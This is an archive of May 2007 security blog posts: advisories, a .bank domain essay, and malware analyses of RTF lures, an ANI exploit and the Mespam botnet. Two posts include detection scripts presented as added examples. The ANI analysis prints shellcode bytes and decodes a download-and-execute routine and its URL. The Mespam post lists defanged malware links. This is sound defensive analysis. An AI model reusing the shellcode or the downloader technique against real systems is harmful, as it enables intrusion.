May 2007 - Posts

 

Published: 2007-05-30,
Last Updated: 2007-05-30 10:04:41 UTC
by Daniel Wesemann (Version: 1)
In a previous diary, we've written about the surprising prevalence of those exploit "iframes" which in the end download a file called "funny.php" off a server in Russia, Panama, Ukraine, etc. "funny.php" is an EXE sailing in disguise, and usually a password-stealing spyware of the "Bancos" family. The file changes frequently and cleverly enough to keep the majority of anti-virus products perpetually in the dark. The only two things that tend to "save the day" if a user happens across one of these IFRAMEs are that, firstly, the vulnerabilities exploited are pretty old (and patched), and secondly, the anti-virus detection for the exploit iframe (the infection "vector") is significantly better than detection for the spyware (the "payload").

Some anti-virus products apparently trigger on the "obfuscation" of the exploit (it is encoded JavaScript), risking a higher false positive rate by doing so but also making it less likely that a tiny change in the exploit code renders the signature useless. Others apparently trigger on the exploit itself. The obfuscation and exploits used have been pretty much the same for the past three months, so one would reasonably expect anti-virus coverage to be well in place.

When today a user of mine "found" another one of these funny.phps, I decided to pass both the vector and payload files through Virustotal to see who was up to snuff:

Virustotal results for the obfuscated exploit file ("forum.php")

Virustotal results for the payload ("funny.php")

The results speak for themselves, with quite a few prominent vendors competing for the coveted "Sees No Virus" award :). I'm constantly amazed at how anti-virus ever could grow into a multi-billion dollar industry.

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: May 31, 2007
********************************************************************

Summary
=======
The following bulletin has undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-029

Bulletin Information:
=====================

* MS07-029

- http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx
- Reason for Revision: Bulletin revised. File Information updated for Windows Server 2003. Clarification added throughout the bulletin for server configurations that may require the installation of DNS functionality as a prerequisite for the security update installation.
- Originally posted: May 8, 2007
- Updated: May 31, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
********************************************************************

 

Published: 2007-05-29,
Last Updated: 2007-05-29 23:29:45 UTC
by Joel Esler (Version: 2)
/** Hope you Windows guys have better luck with this update than other Apple Updates in the past **/

UPDATE: A lot of people have written in telling us that 7.1.6 is the current version and there are no other updates. Yes, 7.1.6 IS CURRENT. This is a security update FOR 7.1.6, as indicated in the subject. Please see http://www.apple.com/support/downloads/; you will see that there ARE security updates.

http://docs.info.apple.com/article.html?artnum=305531

Security Update (QuickTime 7.1.6)

QuickTime

CVE-ID: CVE-2007-2388

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: An implementation issue exists in QuickTime for Java, which may allow instantiation or manipulation of objects outside the bounds of the allocated heap. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of Java applets. Credit to John McDonald, Paul Griswold, and Tom Cross of IBM Internet Security Systems X-Force, and Dyon Balding of Secunia Research for reporting this issue.

QuickTime

CVE-ID: CVE-2007-2389

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to the disclosure of sensitive information

Description: A design issue exists in QuickTime for Java, which may allow a web browser's memory to be read by a Java applet. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to the disclosure of sensitive information. This update addresses the issue by clearing memory before allowing it to be used by untrusted Java applets.

(Information came from Apple's website)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Published: 2007-05-25,
Last Updated: 2007-05-25 22:54:35 UTC
by Bojan Zdrnja (Version: 1)
We are receiving more reports about targeted attacks claiming to be from the Better Business Bureau. The spam always comes with an RTF attachment. Does this ring a bell? If you're a frequent reader of ISC you might remember that I already posted an analysis of such an attack back in March; you can find it here: http://isc.sans.org/diary.html. BBB also posted an alert about this quite a while ago (http://www.bbb.org/alerts/article.asp).

Basically the attackers use an application called Object Packager to embed an executable in an RTF document. The executable is typically a downloader which, when executed, downloads a second stage malware. The attackers keep changing both the downloader and the second stage malware, together with the sites they are using. It is worth pointing out again that this attack does not exploit any Office vulnerability; instead it relies on social engineering (see the screenshots in the old diary).

While the attack itself is not very interesting, what is interesting is that the spam e-mails carrying this seem to be targeted. In fact, almost all reports we've received lately (and Sunbelt blogged about the same thing at http://sunbeltblog.blogspot.com/2007/05/seen-in-wild-extremely-dangerous-better.html) claimed that only a couple of users in the attacked organizations received this, and that they were almost always CEOs or CFOs.

So what can we do here? As you can see from my old diary, AV detection of embedded objects in RTF documents seems to be very weak. The detection of the downloader I extracted at that point in time was a bit better but this was still far away from perfect, especially when we’re talking about the last line of defense – the AV program on the desktop machine.

If possible, you can block RTF files on your e-mail gateways, but this might have a counterproductive effect as we’ve been encouraging users for years to use “more friendly” text formats such as RTF (and who thought that objects can be embedded this easily in them).

As always, the best defense here is user education. Besides general awareness, it might be good to warn your users (especially the C*O levels) about this particular attack as it does rely purely on social engineering (the user has to confirm that he wants the executable opened).
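Because gateway AV is weak on embedded objects, it helps to be able to look for the Object Packager pattern yourself. The scanner below is an added example, not code from the diary or from ISC: it walks every `\object` group in an RTF file, decodes the `\objdata` hex blob, and flags embedded (`\objemb`) objects whose class is `Package` (the class name Object Packager uses) or whose native data carries an `MZ` executable header. It assumes the OLE 1.0 object header layout (version, format id, length-prefixed class/topic/item names, native data size) from MS-OLEDS; the sample RTF and both object blobs are constructed here for the test, including a placeholder `complaint.exe` stub.

```python
import re
import struct


def _ole1_blob(class_name, native):
    """Constructed OLE 1.0 embedded-object blob: OLEVersion, FormatID=2 (embedded), then
    length-prefixed ClassName/TopicName/ItemName and the native data (layout per MS-OLEDS)."""
    def lps(s):
        raw = s.encode("ascii") + b"\x00"
        return struct.pack("<I", len(raw)) + raw
    return (b"\x01\x05\x00\x00" + struct.pack("<I", 2) + lps(class_name)
            + struct.pack("<I", 0) + struct.pack("<I", 0)
            + struct.pack("<I", len(native)) + native)


# Constructed sample: a BBB-style lure carrying an Object Packager ("Package") object whose
# native data wraps an executable stub, plus a harmless embedded spreadsheet for contrast.
PACKAGE_BLOB = _ole1_blob("Package", b"\x02\x00complaint.exe\x00C:\\complaint.exe\x00"
                          + b"MZ\x90\x00\x03\x00" + b"\x00" * 24)
SHEET_BLOB = _ole1_blob("Excel.Sheet.8", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
SAMPLE_RTF = ("{\\rtf1\\ansi Please review the attached complaint.\\par "
              "{\\object\\objemb{\\*\\objclass Package}\\objw1440\\objh1440"
              "{\\*\\objdata " + PACKAGE_BLOB.hex() + "}}"
              "{\\object\\objemb{\\*\\objclass Excel.Sheet.8}"
              "{\\*\\objdata " + SHEET_BLOB.hex() + "}}}")


def _balanced_group(text, start):
    """Return the brace-balanced RTF group beginning at text[start] == '{'."""
    depth, i = 0, start
    while i < len(text):
        c = text[i]
        if c == "\\":          # control word or escaped brace: never counts as a brace
            i += 2
            continue
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return text[start:]


def _native_data(blob):
    """Split an OLE 1.0 blob into (class name, native data); unknown layouts pass through whole."""
    if blob[:4] != b"\x01\x05\x00\x00":
        return None, blob
    try:
        pos, names = 8, []
        for _ in range(3):               # ClassName, TopicName, ItemName
            n = struct.unpack_from("<I", blob, pos)[0]
            pos += 4
            names.append(blob[pos:pos + n].rstrip(b"\x00").decode("latin-1"))
            pos += n
        size = struct.unpack_from("<I", blob, pos)[0]
        return names[0], blob[pos + 4:pos + 4 + size]
    except struct.error:
        return None, blob


def scan_rtf(text):
    """Report every \\object group; flag embedded Packager objects or ones carrying an MZ header."""
    findings = []
    for m in re.finditer(r"\{\\object\b", text):
        group = _balanced_group(text, m.start())
        cls_m = re.search(r"\\objclass\s+([^}\\]+)", group)
        data_m = re.search(r"\\objdata\s*([0-9a-fA-F\s]+)", group)
        blob = bytes.fromhex("".join(data_m.group(1).split())) if data_m else b""
        hdr_cls, native = _native_data(blob)
        cls = (cls_m.group(1).strip() if cls_m else hdr_cls) or "unknown"
        embedded = "\\objemb" in group
        has_mz = b"MZ" in native
        findings.append({"class": cls, "embedded": embedded, "native_bytes": len(native),
                         "has_mz": has_mz,
                         "suspicious": embedded and (cls == "Package" or has_mz)})
    return findings


if __name__ == "__main__":
    for finding in scan_rtf(SAMPLE_RTF):
        print(finding)
```

Run against a real attachment with `scan_rtf(open(path, encoding="latin-1").read())`. The `Package` class check is the cheap, precise signal for Object Packager; the `MZ` check catches the same payload when the attacker picks a different class name, at the cost of also firing on any legitimately embedded executable.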

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Cross-Platform OpenOffice Virus Proof of Concept

Published: 2007-05-24,
Last Updated: 2007-05-24 20:08:18 UTC
by John Bambenek (Version: 1)

A virus writer sent a proof-of-concept virus called BadBunny to Sophos that uses vulnerabilities in OpenOffice to infect Windows, Linux and Mac OS X. Depending on the host operating system, the virus will perform different actions to infect the target machine. In this case, it downloads a lewd image of a scantily clad woman and a dude in a big ol' bunny suit. It's not the first or last attempt at such cross-platform virus writing (or the inclusion of bizarre graphics in malware) but the limitation of seeing much of this cross-platform work lies in the fact that few applications are widely deployed and run on multiple operating systems. Few people use OpenOffice (in comparison to MS Office) to make it worth the while of a would-be attacker looking for anything other than bragging rights. However, viruses are possible for a variety of operating systems (yes, including Mac OS X) and the day may come when those users will have to be just as vigilant as those on Windows.
--
John Bambenek / bambenek {at} gmail [dot] com
University of Illinois at Urbana-Champaign

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Check this one out, it's the one we have been waiting for!

 

********************************************************************
Title: Microsoft Security Advisory Notification
Issued: May 22, 2007
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (927891)

- Title: Fix for Windows Installer (MSI)
- http://www.microsoft.com/technet/security/advisory/927891.mspx
- Revision Note: Advisory published: May 22, 2007
********************************************************************

Ok this is NOT good.  Good catch Donna!! 

Symantec AntiVirus cannot detect viruses after you install a hotfix

Symantec AntiVirus cannot detect viruses after you install a hotfix on a computer that is running Windows Server 2003 or Windows XP SP2

You install a hotfix on Microsoft Windows Server 2003 or on Microsoft Windows XP Service Pack 2 (SP2). However, after you install the hotfix, Symantec AntiVirus cannot correctly detect viruses in encrypted files that reside on a network share or in a document library.

This problem occurs if you have installed the hotfix that is described in the following Microsoft Knowledge Base article:
922582 (http://support.microsoft.com/kb/922582/) Error message when you try to update a Microsoft Windows-based computer: "0x80070002"

This problem occurs if the following conditions are true:
• A legacy filesystem filter driver is installed on the same computer as Symantec AntiVirus.
• The legacy filesystem filter driver is configured to encrypt files that are stored on network shares. 

http://support.microsoft.com/default.aspx?scid=kb;en-us;933215
http://support.microsoft.com/kb/922582/

Published Monday, May 21, 2007 6:18 PM by donna

Source: Symantec AntiVirus cannot detect viruses after you install a hotfix - Donna's SecurityFlash

 

Published: 2007-05-22,
Last Updated: 2007-05-22 07:17:54 UTC
by Bojan Zdrnja (Version: 2)
Some time ago one of our readers, Andrew, submitted an interesting ANI exploit sample. Unless you’ve been under a rock for the last couple of months, you heard about the latest ANI vulnerability.

Most of the exploits we’ve seen so far (and we’ve seen thousands of them) didn’t try to obfuscate the exploit code. The exploit code itself almost always contained a downloader that downloaded the second stage binary from a remote site and executed it on the victim’s machine.

As the exploit wasn't obfuscated, running the strings command was enough to see the URL of the second stage binary. So, in order to see the second stage binary, Andrew ran strings on the new ANI exploit; however, this time no URL was present:

$ strings 123.htm
RIFF
ACONanih$

jvvr<1142;03820940:21921PQVGRCF0GZG
IgvRtqeCfftguu


Those experienced analysts amongst you will immediately notice the string starting with jvvr< and will comment that this must be an XOR-ed URL (http://something). In other words, it appears that this exploit is obfuscating the target URL. Andrew came to the same conclusion and tried to crack the XOR code.

If you try to XOR jvvr to get http, you will see that the correct XOR value is 0x02. The easiest way to do this is to use a nice little utility by Didier Stevens called XORSearch (http://didierstevens.wordpress.com/programs/xorsearch/). This utility allows you to brute force a file in order to find a XOR key for any string in the file. So I downloaded the utility and ran it on the ANI exploit sample and indeed, the correct XOR value for the http string is 0x02, but the rest of the URL was still not there:

D:\>XORSearch.exe 123.htm http
Found XOR 02 position 01FB: http>3360921:02;62803;03RSTEPAD2EXE


We can see something at the end as well that looks like notepad.exe. This means that the URL is either XOR-ed with multiple keys or some other obfuscation is used. At this point you have a couple of options: you can play with brute forcing, you can infect a goat machine and just see what happens (it's easy enough to capture the network traffic of a goat machine and see what the target URL is), or you can try to analyze the exploit code itself, and that's what we'll do.

The trick with the latest ANI exploit was that the two bytes after the “anih” section define how many bytes are to be copied. As the vulnerable function reserved only 36 bytes on the stack it was easy to cause a buffer overflow (I won’t go into details now but the first section copy function was patched previously). So, let’s see what we have in this file:

$ xxd 123.htm
0000000: 5249 4646 0004 0000 4143 4f4e 616e 6968 RIFF....ACONanih
0000010: 2400 0000 2400 0000 ffff 0000 0a00 0000 $...$...........
0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000030: 1000 0000 0100 0000 5453 494c 0300 0000 ........TSIL....
0000040: 1000 0000 5453 494c 0300 0000 0202 0202 ....TSIL........
0000050: 616e 6968 a803 0000 0b0b 0b0b 0b0b 0b0b anih............
0000060: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................


We sure have two anih sections. The buffer size of the second section (the anih at offset 0x50 in the dump above) is 0x03a8, which is actually 936 bytes, right to the end of the file. We can also see that this section starts with a lot of 0x0b bytes. After a bunch of 0x0b bytes we can see something that looks like real code:

00000a0: 0b0b 0b0b 0b0b 0b0b 17a2 4000 0b0b 0b0b ..........@.....
00000b0: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................
00000c0: 31c9 6681 c138 02eb 035e eb05 e8f8 ffff 1.f..8...^......
00000d0: ff83 c609 802e 0246 e2fa ea02 0202 025f .......F......._
00000e0: 83ef 2f14 4202 ea8a 0302 028f 872b 1542 ../.B........+.B
00000f0: 02ea 0202 0277 746e 6f71 7030 666e 6e02 .....wtnoqp0fnn.


So what we’ll do now is take this code and disassemble it. It looks like the real code starts at 0x00000c0, so let’s get rid of everything before that:

$ dd if=123.htm of=code ibs=1 skip=192

Now there are various ways on how to disassemble this. If you are lucky and have a license for IDA Pro you can just load this file into it (actually, you can even load the 123.htm file and then manually tell IDA Pro to start disassembling the code around 0x00000c0). As I really like OllyDbg, I tend to do everything with it but in order to load this code into OllyDbg we have to create a PE file. The process now is same as when you analyze a shellcode so the easiest way is to use iDefense’s Malcode Analysis Pack and its Shellcode2Exe utility (http://labs.idefense.com/software/malcode.php#more_malcode+analysis+pack).

Once you’ve done this you will have an executable file with proper sections and headers that actually executes your code. This is how it looks in OllyDbg:

OllyDbg

So what do we have here? The real code starts at 0x00401020. It first zeroes the ECX register (the XOR instruction) and adds 0x238 to it. Then it does a couple of jumps and a CALL in order to get the address of the ADD ESI,9 instruction into the ESI register. This is a standard method of getting the code address into a register (a CALL instruction followed by a POP instruction). The code skips 9 bytes and then loops over the next 0x238 bytes. In the loop, each byte is decreased by 0x02! Aha, so this is how they obfuscated it: the code modifies itself completely (both the URL and the actual code).

You can now execute this in OllyDbg and see what happens (you will have to set a breakpoint after the loop and then tell OllyDbg to re-analyze this section). Or, if you are just interested in the final URL, we can use perl to subtract 0x02 from every byte in this file (the s modifier makes the dot match newline bytes too, and the mask keeps the result within one byte):

$ perl -pe 's/(.)/chr((ord($1)-0x02)&0xff)/ges' < code > final

$ strings final
urlmon.dll
URLDownloadToFileA
c:\boot.inx
c:\boot.inx
LoadLibraryA
WinExec
ExitProcess
http://[REMOVED].72.80/70/NOTEPAD.EXE
GetProcAddress


And here we are! You can see that the code loads urlmon.dll, uses the URLDownloadToFileA() function to download the URL at the bottom and saves it as c:\boot.inx.
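The two checks in this diary, the oversized anih chunk and the single-byte decoding, are simple enough to script. The following is an added example (not the diary's code, not XORSearch, and not a tool from ISC) in Python: it walks the RIFF chunk list and reports any anih chunk whose declared size is not the 36 bytes the header should occupy, then brute-forces every single-byte key for both XOR and subtraction so that the additive scheme used here is recovered cleanly where XOR alone gives "http>33..." garbage. The sample file and the obfuscated URL (a placeholder host, example.invalid, with each byte increased by two) are constructed inline; chunk names and layout follow the hexdump above.

```python
import struct

ANIH_SIZE = 36  # size of a well-formed "anih" header; the vulnerable copy trusted the chunk size instead

# Constructed fixture: an obfuscated URL made the way the diary describes (every byte
# increased by 2), using a placeholder host rather than the diary's redacted one.
PLAIN_URL = b"http://example.invalid/files/sample.exe"
OBFUSCATED = bytes((b + 2) & 0xFF for b in PLAIN_URL)


def build_sample():
    """Constructed RIFF/ACON file modelled on the diary's hexdump: a 36-byte anih, two small
    filler chunks, then a second anih whose declared size is far larger than 36."""
    good = b"anih" + struct.pack("<I", ANIH_SIZE) + struct.pack("<I", ANIH_SIZE) + b"\x00" * 32
    filler = b"TSIL" + struct.pack("<I", 3) + b"\x10\x00\x00\x00"
    filler += b"TSIL" + struct.pack("<I", 3) + b"\x02\x02\x02\x02"
    payload = b"\x0b" * 16 + OBFUSCATED          # 0x0b sled, then the obfuscated bytes
    bad = b"anih" + struct.pack("<I", len(payload)) + payload
    body = b"ACON" + good + filler + bad
    return b"RIFF" + struct.pack("<I", len(body)) + body


SAMPLE = build_sample()


def iter_chunks(data):
    """Walk the RIFF chunk list: 4-byte id, little-endian size, body padded to even length."""
    if data[:4] != b"RIFF" or data[8:12] != b"ACON":
        raise ValueError("not a RIFF/ACON animated cursor")
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        yield cid, size, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)


def suspicious_anih(data):
    """Return (chunk index, declared size) for every anih chunk that is not exactly 36 bytes."""
    return [(i, size) for i, (cid, size, _) in enumerate(iter_chunks(data))
            if cid == b"anih" and size != ANIH_SIZE]


def decode(data, key, mode):
    """Undo a single-byte transform: 'xor' (what XORSearch tries) or 'sub' (subtract key mod 256)."""
    if mode == "xor":
        return bytes(b ^ key for b in data)
    return bytes((b - key) & 0xFF for b in data)


def search_key(data, needle=b"http"):
    """Brute-force both transforms and every key; return (mode, key, offset) where needle appears."""
    hits = []
    for mode in ("xor", "sub"):
        for key in range(1, 256):
            pos = decode(data, key, mode).find(needle)
            if pos != -1:
                hits.append((mode, key, pos))
    return hits


def printable_runs(data, min_len=4):
    """Equivalent of strings(1): runs of printable ASCII at least min_len long."""
    runs, cur = [], bytearray()
    for b in data + b"\x00":            # trailing NUL flushes the last run
        if 0x20 <= b < 0x7F:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    return runs


def recover_urls(data):
    """For each candidate (mode, key), list the decoded strings that start with 'http'."""
    return {(mode, key): [s for s in printable_runs(decode(data, key, mode)) if s.startswith("http")]
            for mode, key, _ in search_key(data)}


if __name__ == "__main__":
    for idx, size in suspicious_anih(SAMPLE):
        print(f"anih chunk #{idx} declares {size} bytes (expected {ANIH_SIZE}): overflow candidate")
    for (mode, key), urls in recover_urls(SAMPLE).items():
        print(f"{mode} key 0x{key:02x}: {urls}")
```

Both transforms find key 0x02 because the letters of "http" all have bit 1 set, so XOR and subtraction agree on them; they diverge on ':' and '/', which is exactly why XORSearch printed "http>33..." while the subtraction run yields the whole URL. For a real sample, replace `SAMPLE` with the file contents and feed `recover_urls` the body of the flagged chunk.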

Luckily, the AV vendors were on the ball this time: almost all of them detected the ANI file properly (I do wonder if they had specific signatures for this or used a generic/heuristic one).

UPDATE

Just as I wrote that almost all AV vendors detected this sample properly, it looks like some are raising false positives as well.

We received several e-mails from our readers stating that Norton Internet Security (Symantec) detects this diary as an intrusion (“HTTP ANI File Anih Hdr Size BO”) and as a result blocks access to the diary, no matter what browser you’re using.
This is clearly a false positive as there are no ANI files in the diary (just one PNG screenshot of OllyDbg):

$ file ollyani.PNG
ollyani.PNG: PNG image data, 689 x 513, 8-bit/color RGB, non-interlaced

My guess is that they must be triggering on the hexdump or the ASCII part of it. If you are running an affected version of Symantec and have some time to play with it, it would be interesting to see what exactly triggers this – let us know if you figure this out.

Bojan

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************
Title: Microsoft Security Advisory Notification
Issued: May 21, 2007
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (937696)

- Title: Release of Microsoft Office Isolated Conversion Environment (MOICE) and File Block Functionality for Microsoft Office
- http://www.microsoft.com/technet/security/advisory/937696.mspx
- Revision Note: Advisory Published: May 21, 2007
********************************************************************

 

And you can take that to the .bank
Posted by Mikko @ 07:59 GMT


We've been pushing for an initiative to get a secure top-level domain (like ".bank" or ".safe") for some time now. See this post for original context.

We've received lots of questions and also plain criticism over the whole idea – most notably, in Slashdot as well as from Larry Seltzer in his prominent blog.

So let me collect the most typical challenges to the idea, and answer them.

A new top-level domain will not solve the phishing problem once and for all, so it's not even worth considering.

This is not a silver bullet. A new top-level-domain (TLD) would not be the end of the phishing problem. But it would be a helpful top-level domain and it would stop a particular subset of phishing completely.

But .com works just fine!

Today anybody can get a .com domain with a fake name and fake address, with a fake credit card. That's just fine with everybody? Don't we really need a TLD where you could actually trust that you know who owns the domain?

Phishers could still create realistic-looking fake domains. For example a look-a-like for www.citi.bank could be www.citi.bank.account.yadayada.com.

Yes, phishers would still be able to do this; this new top-level-domain would not be able to do anything to stop this problem. Same thing with masked html links.

Illustration by Nenad Jakesevic for Foreign Policy

People are stupid and would not notice such a new address scheme.

The main point of such a new TLD would not be that users would suddenly get a clue and would learn to read the web addresses correctly (although for those who do read the URLs, this would obviously be an improvement). The main point is that it would allow the users' software to work better. Security software and browser toolbars would essentially have a "white list" to work with.

What about security researchers?

This would make life easier for security researchers to figure out which sites are not phishing sites. This really isn't as obvious as it sounds, as banks themselves use tons of different domains. We often spend precious time trying to confirm whether a particular phishy-sounding domain really belongs to a real bank or not.

Small banks and/or credit unions couldn't afford it.

Small banks are not currently the ones losing the most money. It's the big banks. And the domain doesn't have to be ".bank" literally. The TLD could be along the lines of .account, .verified, .safe, et cetera. It would be a TLD for "big players" that deal with lots of money. PayPal or eBay come to mind. And yeah, PayPal isn't a traditional bank but they certainly do get phished. They might want to have a secured TLD for account access.

Organized online criminals could afford to buy .bank domains for $50,000.

Only if they can prove that they are a real bank. And they would not be able to register misleading domain names. And in the worst case, a rogue domain would be shut down quickly. The possibility of losing their investment in registering such a domain wouldn't be worth the risk for criminals.

What about .pro?

The .pro TLD does validate who gets the domains, but it's targeting a different audience (individual professionals like doctors and lawyers).

Extended Validation (EV) certificates largely address the same issues.

We're not against these new high-security web certificates. However, a secure top-level domain would still be a good idea: it would authenticate the domain as trusted by the name alone. There's no way to know if a site has a high-security certificate without visiting it.

Banks don't deserve their own domain.

We already have a TLD for airlines (try www.nw.aero) and museums (try the.british.museum). Isn't it a bit odd we don't have one for banks? Although they are the ones that get attacked all the time?

Would this be a global domain?

Probably. Then again, nothing prevents local governments from setting up domains like .bank.uk, .bank.jp, .bank.au in their own jurisdictions.

Would it work?

Yes: in the end there probably would be no rogue sites under such a new TLD. They would be elsewhere.

There are no rogue sites on .gov domain names. Why? Because you can only get a .gov domain if you really are a US governmental organization. Or how about .fi? The .fi (Finland) domain has very few malicious websites. Why is that? Because the registration process involves mailing a verification code to a physical mailing address. Just that extra step makes it less convenient to use for the bad guys. With all the extra verification steps that we would have in the registration of a .bank domain, scammers just wouldn't be able to do it.

Ok, I'm convinced. What's next?

This initiative won't move further until we find a sponsoring organization that starts to push it and proposes it officially to ICANN. This sponsoring organization is what we are trying to find at the moment.

This piece was crossposted with Foreign Policy blog.

Source: F-Secure : News from the Lab

 

Mespam meets Zunker (and targets German users)

“Whenever I post my computer puts something on the end of my post that I didn't type. Just look, it's that link and the text know will appear when I post this. P.S.Look,Super sreensaver! :)) …”

I wanted to start this blog by quoting a post picked up from one of the many forums contaminated by Mespam to show exactly what infected users experience without having a clue of what’s going on with their computer. If your friends are complaining that your e-mails, blog posts and chat sessions show a suspicious URL linking to photos, jokes or screensavers that you hadn’t sent them, you’re probably another victim of this Trojan.

Trojan.Mespam was originally spotted in February and we described here the new spreading technique, which uses an LSP component to attach text and malicious links to the outgoing HTTP traffic. In the Web 2.0 world this technique has proven its efficiency. It’s worth mentioning that Mespam was distributed via the Trojan.Peacomm P2P network.

In the last few months we’ve seen many recompiled variants of this Mespam coming out, and I’m reporting here some of the malicious URLs that users should absolutely never click, even if they seem to be posted by trusted friends. We have noticed that each outbreak of Mespam has a main “theme” in the spammed messages, such as postcards, jokes, screensavers, and photos, which is configured by a remote C&C center. When we examine the languages of contaminated forums and blogs, it looks like some infections are localized only to specific countries.

February – The “Jokes” malicious URLs series:
 hxxp://jokeonlineworld.com
 hxxp://practicaljokeonline.com
 hxxp://dailyjokeonline.com

March – The “Screensavers” malicious URLs series:
 hxxp://screensavers4us.info/funscr/silly_bear32_funny.scr
 hxxp://webcounterstat.info/screensavers/wallpapers_gold_bear_b.scr

April – The "Sex-game" malicious URLs series:
 hxxp://www.vixen-toys.com/download/sex-game-3.801.zip
 hxxp://www.marketing-know-how.com/just/sex-game-3.801.zip
 hxxp://fruitsinsuits.com.hk/images/flyers/sex-game-3.801.zip

May – The "foto" malicious URLs series (only targeting Germans?):
 hxxp://www.lastik.com/images/foto.exe
 hxxp://www.ultimatexpressions.co.uk/foto.exe
 hxxp://www.arborwood.com/images/foto.exe

With some help from Google I’ve searched forums, blogs and web boards for the keywords included in the spam messages, to estimate how many forums and sites contain infected posts. The results shown in this table were not optimistic. We should mention that Mespam also spreads through IM, traditional e-mail and web mail, so we’re not considering in this statistic all the messages spammed, for example via Gmail, Yahoo Mail, ICQ, AIM, etc.

(*) – the keyword includes all the links spammed for the “screensaver” series

But who controls what the infected bots spam, and where? This diagram shows some Mespam code on the right and a C&C interface on the left.

The interface on the left is also known as "Zunker" and is a C&C web panel that controls Mespam bots. The connections between Mespam code and the Zunker panel are obvious. We have many other clues that they are just different pieces of the same thing. With this panel, the botmaster has quick statistics on the number of infected hosts, affected countries, new bots added recently, and can also see which channels, such as IM, traditional mail, webmail, and forums, are used to send spam.

The configuration area of the panel gives the botmaster the ability to choose a different template message for each channel. This is an example of a configured template found on one of the many Zunker interfaces analyzed recently.

When the botnet becomes big enough, the botmaster can use it to infect more hosts or eventually install a secondary Trojan on the infected machines. This secondary file is always configured from the Zunker interface, and is usually a bank Trojan or DDoS threat. In some cases, after the botnet is ready, the botmaster tries to sell this “install-a-Trojan” service to other cyber-criminals who can decide which Trojan to distribute on the infected hosts.

For example, we’ve seen a file named “ebr9.exe” on a Zunker botnet, which from the panel statistics was targeting mostly German users. This Trojan drops the BHO file “%SYSTEM%\console32.dll” and tries to hijack the execution of the following German programs by changing the registry key “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option” for each of them:

Banking.exe
BankingUpdate.exe
Erinnerung.exe
GetOn4uHdWID.exe
MG.exe
MGBSE.exe
Mnyupdate.exe
Msmoney.exe
Netviewer.exe
Nv_o2o_Teilnehmer_DE.exe
Salv.exe
Sanitize.exe
SCRSetup.exe
Smkonv.exe
StartStarMoney.exe

The reason for this registry key change is unclear, but German users who have these specific programs should double-check their machines for this Trojan.

We don’t know if the Zunker interface was created together with Trojan.Mespam, or if it was added later by someone else. The current statistics of Mespam samples show that there’s a specific Zunker web panel link hardcoded in every different version of Trojan.Mespam DLL. So probably the package Mespam/Zunker is sold together on the underground market.

Posted by Elia Florio on May 18, 2007 03:13 PM

Source: Symantec Security Response Weblog: Mespam meets Zunker (and targets German users)

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 17, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment. Please see the appropriate bulletin for more details.

* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934873
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934233
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
********************************************************************

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 16, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-027
* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-027

- http://www.microsoft.com/technet/security/bulletin/ms07-027.mspx
- Reason for Revision: Bulletin revised due to an incorrect file name in Arbitrary File Rewrite Vulnerability - CVE-2007-2221 killbit table; A new issue discovered with the security update: 937409 The "File Download - Security Warning" dialog box opens when you try to open Internet Explorer 7; Updated file names for Internet Explorer 7
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: Bulletin workarounds section updated, with the removal of the "Use Microsoft Word Viewer 2003 to open and view files" workaround. This workaround is not valid for the vulnerability discussed in this security bulletin.
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: Bulletin "Installation File Information" section updated with the correct file name for the Office 2007 Compatibility Pack.
- Originally posted: May 8, 2007
